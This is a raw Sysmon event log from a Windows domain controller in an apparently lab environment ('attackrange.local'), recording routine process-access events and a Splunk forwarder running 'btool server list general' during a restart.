13:55:52.465{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007009Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007008Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007007Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007006Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007005Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007004Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-85E8-5FCF-1601-000000009101}3048C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007003Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007002Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-85E8-5FCF-1501-000000009101}30203040C:\Windows\system32\cmd.exe{10ACEC4A-85E8-5FCF-1601-000000009101}3048C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007001Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.472{10ACEC4A-85E8-5FCF-1601-000000009101}3048C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{10ACEC4A-85E8-5FCF-1501-000000009101}3020C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000007000Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-85E8-5FCF-1501-000000009101}3020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006999Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006998Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006997Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006996Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006995Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006994Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006993Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006992Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006991Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006990Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85E8-5FCF-1501-000000009101}3020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006989Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.465{10ACEC4A-85E5-5FCF-0801-000000009101}42803180C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{10ACEC4A-85E8-5FCF-1501-000000009101}3020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1893f|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+17106|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1385a|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+12176|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+19082|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d94e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006988Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.467{10ACEC4A-85E8-5FCF-1501-000000009101}3020C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-85E5-5FCF-0801-000000009101}4280C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=3080 10341000x80000000000000006987Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.200{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-85E8-5FCF-1401-000000009101}1512C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006986Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006985Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006984Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006983Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 